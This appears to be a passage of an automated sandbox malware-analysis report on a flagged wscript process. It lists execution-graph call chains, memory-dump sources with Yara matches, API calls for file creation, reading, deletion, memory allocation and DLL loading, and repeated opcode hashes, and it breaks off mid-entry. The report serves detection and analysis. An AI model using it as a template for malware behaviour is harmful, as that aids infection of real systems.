                                                                                                          • Opcode ID: 5cd93b4047db110c4acb45202e462e12528f403a3e6b5f5be8847b3146c24d9a
                                                                                                          • Instruction ID: a5cf49cd76bdda2418164d1ec34f04db0965835d8defbcce980efbe2d0be7e67
                                                                                                          • Opcode Fuzzy Hash: 5cd93b4047db110c4acb45202e462e12528f403a3e6b5f5be8847b3146c24d9a
                                                                                                          • Instruction Fuzzy Hash: 2241AE71900219DFCF29DFE9D880AAEBBB8FF64B40F00412AE955DB254D734D841CBA5

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:2.5%
                                                                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                                                                          Signature Coverage:2.3%
                                                                                                          Total number of Nodes:442
                                                                                                          Total number of Limit Nodes:73
77b7d0 RtlFreeHeap 98703->98705 98704->98683 98705->98704 98706->98701 98706->98702 98706->98703 98707 76a2c0 RtlFreeHeap 98706->98707 98708 76a630 RtlFreeHeap 98706->98708 98707->98706 98708->98706 98710 768521 98709->98710 98711 768528 GetFileAttributesW 98710->98711 98712 768533 98710->98712 98711->98712 98712->98688 98713 773540 98712->98713 98714 77354e 98713->98714 98715 773555 98713->98715 98714->98691 98716 7646f0 LdrLoadDll 98715->98716 98717 77358a 98716->98717 98718 773599 98717->98718 98741 773000 LdrLoadDll 98717->98741 98720 77b8b0 RtlAllocateHeap 98718->98720 98724 773744 98718->98724 98721 7735b2 98720->98721 98722 77373a 98721->98722 98721->98724 98725 7735ce 98721->98725 98723 77b7d0 RtlFreeHeap 98722->98723 98722->98724 98723->98724 98724->98691 98725->98724 98726 77b7d0 RtlFreeHeap 98725->98726 98727 77372e 98726->98727 98727->98691 98729 76a2e6 98728->98729 98742 76dd20 98729->98742 98731 76a358 98732 76a376 98731->98732 98733 76a4e0 98731->98733 98734 76a4c5 98732->98734 98747 76a180 98732->98747 98733->98734 98735 76a180 RtlFreeHeap 98733->98735 98734->98691 98735->98733 98738 76a656 98737->98738 98739 76dd20 RtlFreeHeap 98738->98739 98740 76a6dd 98739->98740 98740->98693 98741->98718 98744 76dd44 98742->98744 98743 76dd51 98743->98731 98744->98743 98745 77b7d0 RtlFreeHeap 98744->98745 98746 76dd94 98745->98746 98746->98731 98748 76a19d 98747->98748 98751 76ddb0 98748->98751 98750 76a2a3 98750->98732 98752 76ddd4 98751->98752 98753 76de7e 98752->98753 98754 77b7d0 RtlFreeHeap 98752->98754 98753->98750 98754->98753 98755 768980 98756 768985 98755->98756 98757 768971 98755->98757 98756->98757 98759 767250 98756->98759 98760 76729f 98759->98760 98761 767266 98759->98761 98760->98757 98761->98760 98763 7670c0 LdrLoadDll 98761->98763 98763->98760 98336 7793c0 98337 77947a 98336->98337 98339 7793f2 98336->98339 98338 779490 NtCreateFile 98337->98338 98764 770300 98765 770323 98764->98765 98766 7646f0 LdrLoadDll 98765->98766 98767 770347 
98766->98767 98345 769dcb 98346 769dd1 98345->98346 98347 769dfd 98346->98347 98348 77b7d0 RtlFreeHeap 98346->98348 98348->98347 98768 760f8b PostThreadMessageW 98769 760f9d 98768->98769 98770 762908 98771 766460 2 API calls 98770->98771 98772 762933 98771->98772

                                                                                                          Control-flow Graph

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s$ $%$+i$._$7$;w$<$$B$C^$C^K?$I}$K?$M$N$P$Q|K?C^$TN$c$ox$zs$~h$x
                                                                                                          • API String ID: 0-2531995965
                                                                                                          • Opcode ID: 58ac908a03dda97e2d506d0bbb24b1bacd85875c8410f95ecad036abca85a7c2
                                                                                                          • Instruction ID: d69b310f097657027b123f7f4612f5dd3fdc65b49acd1d9757443ff89cc418c9
                                                                                                          • Opcode Fuzzy Hash: 58ac908a03dda97e2d506d0bbb24b1bacd85875c8410f95ecad036abca85a7c2
                                                                                                          • Instruction Fuzzy Hash: 1A12F1B0D04229DBDB64CF58C899BDDBBB1BB44309F2081E9D50DAB281D7B85AC9CF51
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0076C884
                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0076C8BF
                                                                                                          • FindClose.KERNELBASE(?), ref: 0076C8CA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                          • Instruction ID: 7c1f7d2659192b50c4ab7d0b3646acb1b16db44990b1de4f8f038f258549779e
                                                                                                          • Opcode Fuzzy Hash: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                          • Instruction Fuzzy Hash: 4031A571900309BBDB21EFA4CC85FFF777CAF84745F144599B949A7180D674AE848BA0
                                                                                                          APIs
                                                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?,?,?), ref: 007794C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                          • Instruction ID: 6d93cb606234187c5aa293951f5dc045ceb781748587baef6b3f47a3f8b74882
                                                                                                          • Opcode Fuzzy Hash: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                          • Instruction Fuzzy Hash: 6131D2B5A01208AFDB54DF98D885EEFB7B9EF8C314F108209F918A7340D774A851CBA5
                                                                                                          APIs
                                                                                                          • NtReadFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?), ref: 00779619
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                          • Instruction ID: 855a3799ce3681b36356bad3c31966bdbd79055ca194f33b999984a067bf54c6
                                                                                                          • Opcode Fuzzy Hash: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                          • Instruction Fuzzy Hash: BD31F7B5A00208AFDB14DF98D885EEFB7B9EF8C714F008209FD18A7340D774A9518BA5
                                                                                                          APIs
                                                                                                          • NtAllocateVirtualMemory.NTDLL(00761F1E,?,0077819F,00000000,00000004,52D358EE,?,?,?,?,?,0077819F,00761F1E,0077819F,8DFFFEB0,00761F1E), ref: 00779918
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 2167126740-0
                                                                                                          • Opcode ID: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                          • Instruction ID: d80b73add805c2955a7b8dac6422466d8af8fce07029b235dd70e26354190901
                                                                                                          • Opcode Fuzzy Hash: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                          • Instruction Fuzzy Hash: ED211CB5A00208ABDB14DF98DC45EEF77B9EF89710F008209FD18A7241D774A811CBA5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                          • Instruction ID: bdd204b9062f0b729bc69410e0b8cdf6f7ee656fedc025f3c49b7c2c3449ec3a
                                                                                                          • Opcode Fuzzy Hash: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                          • Instruction Fuzzy Hash: E9117371640214BBEB10EB64CC45FEF776CEF85714F008109FA48A7281DBB9B9158BA6
                                                                                                          APIs
                                                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00779717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction ID: 9ad610851d551cad20a64752b499a185de9d5cfd06d2a6a8a13756b4faf6d2e2
                                                                                                          • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction Fuzzy Hash: 50E02C36201204BBD620EA29DC01FEF776CCFC6720F808414FA08A7241CBB0B80187F0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: c2c7d51a3a739ba0a10f5fc54d21fc50660df808c7db1d3c06731409d773d1ff
                                                                                                          • Instruction ID: 250b30010cb16ee8283adf53d2bc8b4b207e8de7f7ce2142c9688254210e6951
                                                                                                          • Opcode Fuzzy Hash: c2c7d51a3a739ba0a10f5fc54d21fc50660df808c7db1d3c06731409d773d1ff
                                                                                                          • Instruction Fuzzy Hash: 54900265601600426140B158480840660999BE2306395C125B055D560C8618D955A269
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: a4516010aee602e8f055c95f1d83f67a22ac511d9e16276f0a4ac371bcf35fb8
                                                                                                          • Instruction ID: c7b304c2ba5292af005df5897ff1facab289e540a5d54bf601772ca4757fb996
                                                                                                          • Opcode Fuzzy Hash: a4516010aee602e8f055c95f1d83f67a22ac511d9e16276f0a4ac371bcf35fb8
                                                                                                          • Instruction Fuzzy Hash: 6C90023560590012B140B158488854640999BE1306B55C021F042D554C8A14DA566361
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: b59815b07b342608f07843d3bad8b1a2f585011f4c5fe2c115fec6818b131126
                                                                                                          • Instruction ID: 05e97b15367856d898710a31a31e9b86ccbabdca0622fa63043af058f8c06e8d
                                                                                                          • Opcode Fuzzy Hash: b59815b07b342608f07843d3bad8b1a2f585011f4c5fe2c115fec6818b131126
                                                                                                          • Instruction Fuzzy Hash: FC90023520150402F100B598540C64600998BE1306F55D021B502D555EC665D9917131
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: b19fe59af5e765d34c4514df7d587a808087340d078145b04e188e2da473bf8c
                                                                                                          • Instruction ID: 32a69845a73a55f2236f53859994e098222a6f1d49d67d973dcb9b5c337a1b79
                                                                                                          • Opcode Fuzzy Hash: b19fe59af5e765d34c4514df7d587a808087340d078145b04e188e2da473bf8c
                                                                                                          • Instruction Fuzzy Hash: 8D90023520158802F110B158840874A00998BD1306F59C421B442D658D8695D9917121
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 094a072cc4411cae9638534645ff4e4b37d0f3cf916f8729c22c75c13265378c
                                                                                                          • Instruction ID: 15433f4b2c903868ecef30e1075d3c4f3dbf7810c0c6a74c38be2bd1dc5cb2db
                                                                                                          • Opcode Fuzzy Hash: 094a072cc4411cae9638534645ff4e4b37d0f3cf916f8729c22c75c13265378c
                                                                                                          • Instruction Fuzzy Hash: 8B90023520150842F100B1584408B4600998BE1306F55C026B012D654D8615D9517521
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 4125b47c2240621961fe87f14b06f5455d3acd6be21c44a40256cbdbb4060d6d
                                                                                                          • Instruction ID: d87cb9daf743411c8fbe010dcda1888311ed57527ae39bc528910d0aa469f442
                                                                                                          • Opcode Fuzzy Hash: 4125b47c2240621961fe87f14b06f5455d3acd6be21c44a40256cbdbb4060d6d
                                                                                                          • Instruction Fuzzy Hash: F2900225242541527545F1584408507409A9BE1246795C022B141D950C8526E956E621
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 66f72bec280a2429cc99a972cbe0e963076c0cacf65e47a9ff6c179ccc4a1f81
                                                                                                          • Instruction ID: 2cbc59cad12b4ebdb91783d385c8c570b7b8ba7c3dfab735aae5b15ac7ac6ca5
                                                                                                          • Opcode Fuzzy Hash: 66f72bec280a2429cc99a972cbe0e963076c0cacf65e47a9ff6c179ccc4a1f81
                                                                                                          • Instruction Fuzzy Hash: A290023520150413F111B1584508707009D8BD1246F95C422B042D558D9656DA52B121
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: a1718c965a1d7728e12b257630bd79188fe3f76704718946c68ba188b666957e
                                                                                                          • Instruction ID: 7b5eab76867c488da11d49bb601b270bd52c74994ae361bdcf022f1177569383
                                                                                                          • Opcode Fuzzy Hash: a1718c965a1d7728e12b257630bd79188fe3f76704718946c68ba188b666957e
                                                                                                          • Instruction Fuzzy Hash: F490022D21350002F180B158540C60A00998BD2207F95D425B001E558CC915D9696321
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 8daf10fff9185ccc284fe6a898153ff2e231d33f47d0cadccb41ae72076538d1
                                                                                                          • Instruction ID: ef9b1603f0fd529374d7fcf1be1e20f12edf57f521226542eec27907cf9fc976
                                                                                                          • Opcode Fuzzy Hash: 8daf10fff9185ccc284fe6a898153ff2e231d33f47d0cadccb41ae72076538d1
                                                                                                          • Instruction Fuzzy Hash: 8C90022530150003F140B158541C6064099DBE2306F55D021F041D554CD915D9566222
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 381fb93a57c549f745aa6d291aa1079b33ffba4668fe1e775452f7fa0a94e1c3
                                                                                                          • Instruction ID: 2a835545db4eaeb1255d3eecb9acddbd267db113a20f0bdba0822a0c52f323f1
                                                                                                          • Opcode Fuzzy Hash: 381fb93a57c549f745aa6d291aa1079b33ffba4668fe1e775452f7fa0a94e1c3
                                                                                                          • Instruction Fuzzy Hash: F390022560150502F101B1584408616009E8BD1246F95C032B102D555ECA25DA92B131
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 7052e4642c8091d75f508e327e87c7e81f9b92f24af250a7f1a13cf040e750cd
                                                                                                          • Instruction ID: 92e3f3577a2279fb7289dc435e8fc025db9f248e752cf53045ce07699f181993
                                                                                                          • Opcode Fuzzy Hash: 7052e4642c8091d75f508e327e87c7e81f9b92f24af250a7f1a13cf040e750cd
                                                                                                          • Instruction Fuzzy Hash: EA90026520190403F140B558480860700998BD1307F55C021B206D555E8A29DD517135
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 603e875f67359ad870d6872ac59b4cbc3da28510b5525cfdadb222b97ade7458
                                                                                                          • Instruction ID: 02d24faf77bb8730c8170e0bfd94882f3ef49eae78d25f3c4d1aa7128074f102
                                                                                                          • Opcode Fuzzy Hash: 603e875f67359ad870d6872ac59b4cbc3da28510b5525cfdadb222b97ade7458
                                                                                                          • Instruction Fuzzy Hash: A5900225601500426140B16888489064099AFE2216755C131B099D550D8559D9656665
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: a59443d9e54098bd722ba3ea460a7a5e9980aa4273f2a3e5c372d507639236d3
                                                                                                          • Instruction ID: 682e56368491663532db36b3adf5415e5fe44bd4d571c542986b1aff15b6bace
                                                                                                          • Opcode Fuzzy Hash: a59443d9e54098bd722ba3ea460a7a5e9980aa4273f2a3e5c372d507639236d3
                                                                                                          • Instruction Fuzzy Hash: 06900225211D0042F200B5684C18B0700998BD1307F55C125B015D554CC915D9616521
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 7e444177739090042a6602d9c47253f702a3c92cb0fd6b47d7e5a6246afaed69
                                                                                                          • Instruction ID: 2a27540249f5b96e09f7bb82b790fea2b2a6c6e52b9388d914de7ca5dad37b75
                                                                                                          • Opcode Fuzzy Hash: 7e444177739090042a6602d9c47253f702a3c92cb0fd6b47d7e5a6246afaed69
                                                                                                          • Instruction Fuzzy Hash: 1190026534150442F100B1584418B060099CBE2306F55C025F106D554D8619DD527126
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: f49779acb9f8571defdf522b6dcad181f6b930d973a21ec2e0f52afca32d4de2
                                                                                                          • Instruction ID: d7832cfe260bf2853272903cbc0c9e04bb7901a72180a04cba077bc8c7b5dbe0
